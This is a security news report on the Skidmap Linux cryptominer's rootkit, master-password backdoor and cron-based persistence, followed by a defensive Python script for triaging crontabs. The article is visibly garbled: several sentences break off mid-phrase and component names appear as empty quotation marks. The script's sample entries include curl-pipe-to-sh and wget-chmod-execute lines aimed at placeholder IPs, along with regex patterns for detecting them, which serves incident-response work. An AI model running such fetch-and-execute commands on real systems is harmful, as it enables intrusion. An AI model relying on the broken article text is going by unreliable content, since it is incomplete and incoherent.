This malware stands out from similar miners because of the way it loads malicious kernel modules to evade detection.
The crypto-miner also sets up a secret master password that it uses to access any user account on the system.
“These kernel-mode rootkits are not only more difficult to detect compared to their user-mode counterparts — attackers can also use them to gain unfettered access to the affected system. A case in point: the way Skidmap can also set up a secret master password that gives it access to any user account in the system,” reads the analysis published by Trend Micro. “Conversely, given that many of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether through exploits, misconfigurations, or exposure to the internet — are most likely the same ones that provide the attacker root or administrative access to the system.”
Experts noticed that several routines implemented by Skidmap require root access, suggesting that its attack vector is the same one that provided the attackers with root or administrative access to the system.
The infection chain sees the Skidmap miner installing
“Besides the backdoor access, Skidmap also creates another way for its operators
The main binary checks whether the system runs Debian or RHEL/CentOS, then drops the miner and other components built for that specific Linux distro.
Trend Micro experts revealed that the Skidmap miner has notable components designed to obfuscate its activities and ensure that they continue to run. Samples of these components are:
A fake “” binary that replaces the original; once executed, it randomly sets up a malicious cron job to download and execute a file.
Another component is “
Trend Micro also described the “
The last component is “
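The fake binary described above persists by planting a cron job that downloads and executes a file. A defender reviewing a compromised host can triage cron entries for exactly that download-then-execute pattern. The script below is an added example written for this page, not code from the article or from Trend Micro's analysis; the crontab lines it scans are constructed samples (the hostnames and paths in them are placeholders, not Skidmap indicators), and the regular expressions are an assumed heuristic rather than a signature for this malware.

```python
import re
import sys
from typing import Dict, List

# Constructed sample crontab (user-crontab format: five schedule fields + command).
# None of these lines come from the article or from a real Skidmap sample.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/updatedb
*/10 * * * * curl -fsSL http://203.0.113.10/payload.sh | sh
30 3 * * 1 wget -q -O /tmp/.x http://198.51.100.7/x && chmod +x /tmp/.x && /tmp/.x
15 4 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""

# Heuristic (assumed, not from the page): a fetch tool in the command ...
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# ... combined with something that runs what was fetched: piping into a shell,
# chaining into a shell or a scratch directory, or marking a file executable.
EXEC_AFTER_DOWNLOAD = re.compile(
    r"\|\s*(ba)?sh\b"                      # curl ... | sh
    r"|&&\s*(sh|bash|/tmp/|/dev/shm/|\./)"  # && /tmp/.x
    r"|\bchmod\s+\+x\b"                     # chmod +x on the downloaded file
)


def parse_crontab(text: str, system_format: bool = False) -> List[Dict]:
    """Split crontab text into entries.

    system_format=True handles /etc/crontab and /etc/cron.d files, which carry
    a user column between the schedule and the command.
    """
    n_fields = 6 if system_format else 5
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue  # skip blanks, comments and VAR=value assignments
        parts = line.split(None, n_fields)
        if len(parts) < n_fields + 1:
            continue  # malformed line; nothing to run
        entries.append({
            "line": lineno,
            "schedule": " ".join(parts[:5]),
            "user": parts[5] if system_format else None,
            "command": parts[n_fields],
        })
    return entries


def is_download_and_execute(command: str) -> bool:
    """True when a command both fetches content and executes it."""
    return bool(DOWNLOADER.search(command)) and bool(EXEC_AFTER_DOWNLOAD.search(command))


def find_suspicious(text: str, system_format: bool = False) -> List[Dict]:
    """Return the crontab entries that match the download-and-execute heuristic."""
    return [e for e in parse_crontab(text, system_format) if is_download_and_execute(e["command"])]


if __name__ == "__main__":
    # Usage: python triage_cron.py [crontab files...]; with no arguments the
    # constructed sample is scanned so the script runs offline.
    sources = [(p, open(p).read()) for p in sys.argv[1:]] or [("<sample>", SAMPLE_CRONTAB)]
    for name, text in sources:
        for entry in find_suspicious(text):
            print(f"{name}:{entry['line']}: {entry['schedule']} -> {entry['command']}")
```

Running it against `crontab -l` output or the files under /etc/cron.d (pass `system_format=True` for those) flags the two constructed entries that fetch a payload and run it, while the ordinary maintenance jobs pass. The heuristic is deliberately narrow; it is a triage aid that complements, rather than replaces, verifying the cron binary itself against the package manager.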
(SecurityAffairs – Skidmap miner, Linux)